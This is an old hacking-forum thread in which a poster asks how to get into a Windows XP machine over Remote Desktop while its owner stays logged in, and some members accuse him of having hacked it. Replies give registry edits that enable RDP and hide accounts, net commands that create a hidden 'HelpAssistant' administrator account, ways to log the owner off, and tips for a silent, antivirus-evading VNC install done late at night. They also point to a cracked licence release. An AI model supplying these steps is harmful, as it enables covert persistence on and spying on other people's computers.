extreme
Feb 14 2004, 09:23 PM
I was logging into Terminal Service via Remote Desktop, and I used my newly created admin username...
But when I clicked login, I got this message:
"User admin\ADM is currently logged in. If you wish to login, you will have to disconnect the current logged in user. Do you wish to disconect him?" Y/N
I clicked No, and waiting for your advice.. How to bypass this "one logged user" limit..????
BTW. It is 24/7 online XP system.. So it allows only one admin to be logged in, but still. Maybe you know how to bypass it...
ThE_snAke
Feb 14 2004, 09:38 PM
wait until he logs off , log in to his pc and change the login settings to unlimited users access
bah
Feb 14 2004, 09:40 PM
What os is the system?
If it is windows xp then only one user can b logged in at a time thats the
limit with xp, theirs nothing u can do their unless u remotely install the beta service
pack 2 and then add a reg key which disables this limit. Info to find the sp2 beta
and the key change is on the web google it.
If the os is win2kserver, then u would need to change the licence profile in
the terminal service. Log on when no one else is on the box and do this
control panel
administrator tools
find the terminal service licenings icons
and change to max 5 logins
their is a crack for unlimited licence some where on the web google it
extreme
Feb 14 2004, 09:41 PM
i don't think he logs off ever because he is online 24/7... I can run any command line program or something though... With Psexec for ex.
but I don't know how would I change login settings to unlimited users access? Is it REG setting or via some program??? Note that it is XP... Maybe that setting is absent or different then on 2k...
net
Feb 14 2004, 09:44 PM
if you have your shell, why do you want to access the terminal services ?
Alexander01
Feb 14 2004, 10:23 PM
u need to grab this rls
MS.Terminal.Services.Limit.Crack.for.WIN2k.SP4-SCOTCH
bah
Feb 14 2004, 10:23 PM
Ok if the system as u say is xp then as I said u can only have one user on at a time.
However even though he appears to b online 24/7 it just means his pc is up and he hasnt logged out. so if u want to get remote access to his desktop with remote desktop u need to do the following
1 enable remote desktop use the following reg key
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"HelpAssistant"=dword:00000000
"Administrator"=dword:00000000
2 .note I would add or enable a new acc called HelpAssistant this is then hidden from the login list on his box.And then add this to the administrator group and
most importantly to allow u to login remotely to the "Remote Desktop Users"
group.
/net adduser HelpAssistant password
/net localgroup Adminsitrators /add HelpAssistant
/net localgroup "Remote Desktop Users" /add HelpAssistant
3 log off his account -- do this with any number of tools
reboot.exe psx.. kill svchost locally
4. remote desktop to box and login with HelpAssistant and password u choose
Note if u cant add a user to "Remote Desktop Users" then the system isnt winxp professional and is only home edition, home edition DOESNT allow remote desktop
access!
hope u get it to work
reguards
s54
Feb 15 2004, 01:33 PM
Am I wrong or do I see active support of illegal hacking in this thread?
extreme
Feb 15 2004, 10:05 PM
You are wrong.. That is simple security testing, and unique problem anyone can bump into if you have another computer in dif. contry for ex. and it is on XP, and yo can't access it via Terminal Service...
s54
Feb 15 2004, 10:31 PM
| QUOTE (extreme @ Feb 15 2004, 10:05 PM) |
| You are wrong.. That is simple security testing, and unique problem anyone can bump into if you have another computer in dif. contry for ex. and it is on XP, and yo can't access it via Terminal Service... |
You are a liar and a bad one in it.
| QUOTE |
| i don't think he logs off ever because he is online 24/7... |
Who is he? Your 2nd "you"? - no I will tell you. It is the victim you hacked and that's pretty clear from the thread.
So don't tell me I am wrong - I rarely do mistakes
ellitio
Feb 16 2004, 11:54 PM
| QUOTE (s54 @ Feb 15 2004, 10:31 PM) |
| QUOTE (extreme @ Feb 15 2004, 10:05 PM) | | You are wrong.. That is simple security testing, and unique problem anyone can bump into if you have another computer in dif. contry for ex. and it is on XP, and yo can't access it via Terminal Service... |
You are a liar and a bad one in it.
| QUOTE | | i don't think he logs off ever because he is online 24/7... |
Who is he? Your 2nd "you"? - no I will tell you. It is the victim you hacked and that's pretty clear from the thread. So don't tell me I am wrong - I rarely do mistakes |
so what's YOU'R problem?
but I also already knew that he had hacked a pc and turned some services on...
extreme
Feb 17 2004, 01:41 AM
"illegall hacking"... Isn't hacking ussually illegal? Security pen. test is legall, if you wish to play with words...
ANyway, it would be illegall if I have said exact IP of mashine or something, and if I had said "I hacked OTHER PEOPLE's mashine without their acceptance"... So watch your language because I don't know if Admins would appreciate your comments about supposed illegal activities on forum... And if you think that hacking other people's mashine is allways 100% bad, then I don't think you belong on this forum..
dotcom
Feb 17 2004, 05:52 PM
| QUOTE (s54 @ Feb 15 2004, 10:31 PM) |
| QUOTE (extreme @ Feb 15 2004, 10:05 PM) | | You are wrong.. That is simple security testing, and unique problem anyone can bump into if you have another computer in dif. contry for ex. and it is on XP, and yo can't access it via Terminal Service... |
You are a liar and a bad one in it.
| QUOTE | | i don't think he logs off ever because he is online 24/7... |
Who is he? Your 2nd "you"? - no I will tell you. It is the victim you hacked and that's pretty clear from the thread. So don't tell me I am wrong - I rarely do mistakes |
Old billy send you your paycheck yet hmm?
Yes he is lying.
No you can't prove it.
Many dumb admins might encounter this or a similar problem.
His wording was totally appropriate for this forum..he didnt speak of improper activites in his post. Could be as simple as 2 brothers on Mom&Dad's home network trying to "get one over" on each other
You are ASSuming too much s54, and trying to be self-righteous while doing it. Thank god your not wrong often, I'm not sure if we could handle it
s54
Feb 17 2004, 07:51 PM
| QUOTE |
| Old billy send you your paycheck yet hmm? |
I owe you 100$ if you can draw a LOGIC connection between my posts above and that statement
| QUOTE |
Thank god your not wrong often, I'm not sure if we could handle it  |
I will take this as a compliment and forget the rolleyes
| QUOTE |
| You are ASSuming too much s54, and trying to be self-righteous while doing it. |
I didn't assume, I concluded. And if speaking the truth is self-righteous in your eyes you should consider my talk more being self-confident and backed up by certain knowledge than arrogant.
by the way, you really made me laugh when you stated I am assuming too much but saying this before:
| QUOTE |
| Could be as simple as 2 brothers on Mom&Dad's home network trying to "get one over" on each other |
If this ain't the mother of all assumptions you can call me Jesus Christ Superstar
- thanks for your post, at least some new verbal quality here
krackatoa
Feb 18 2004, 04:26 AM
Why not remote install vnc with no icon and see what's up?
You can always log him out when there is no activity, then come in via RDP so he sees a locked screen. Clear out your vnc installation.
On s54 comments..
Everyone to his own, the admins decide what is appropriate and what is not.
I personally just do legal pen testing and security research. If someone out there takes their chances and gets caught, they deserve it.
I also like to see what others are doing so I can look for these things on my network. Sometimes, the big brother stance can make the poor sys admins job worse.
I rather have the knowledge then be in the dark.
extreme
Feb 18 2004, 05:04 AM
I have never tryed anything with VNC... So I don't know how to install it silently, or does the owner sees what I am doing with his desktop, and is VNC detected by AVs?
Also, as far as I know, there are alot of VNC clients/servers.. Which one is best?
krackatoa
Feb 18 2004, 11:45 PM
I don't have time to upload the remote cmd line install instructions for vnc right now, I'll drop it in the file download section tomorrow.
It's isn't detected by AV.
The terminal that you install it on will not see anything unless you move the mouse.
The trick is to do it late at night, log him out then use RDP for you to log back in. That way, when using rdp on XP he just sees the locked screen and not what you are doing behind it.
extreme
Feb 22 2004, 03:42 AM
This TS stuff doesn't work.. I tryed it on French Win2k PRO...
Gotisch
Feb 22 2004, 12:37 PM
speaking about illegal stuff in postings :
| QUOTE |
u need to grab this rls
MS.Terminal.Services.Limit.Crack.for.WIN2k.SP4-SCOTCH |
Flapdrol
Feb 26 2004, 10:34 PM
Terminal Services has 2 modes, remote administration and terminal mode. In remote administration mode (which you want, coz only then you have full admin xs possibilites) you are restricted to 2 simultaneous connections. In the TS options you can set the timeout values for IDLE TS connections. If it's set to a long time, like a couple of days, you end up bumping into older sessions.
PL3X59
Mar 1 2004, 08:34 PM
Hi guys
I cant made new post ...
but maybe some one can help me with terminal services [TS]
i have one ipc with an account ..
sO the 3389 port is opend ..
i try to log .. ok it works ...
but i have not the desktOp

what can I Do ?
Thx
DumpZ
Mar 1 2004, 08:37 PM
can u give some more information. what OS etc.
And how do u login
PL3X59
Mar 1 2004, 08:39 PM
it is a 2k serv
I can log in with dameware for exemple
BuT I d like to log me with the remote acces desktop ... the terminal services client
I put the user name and password, it works...
but i dont see anythings after that
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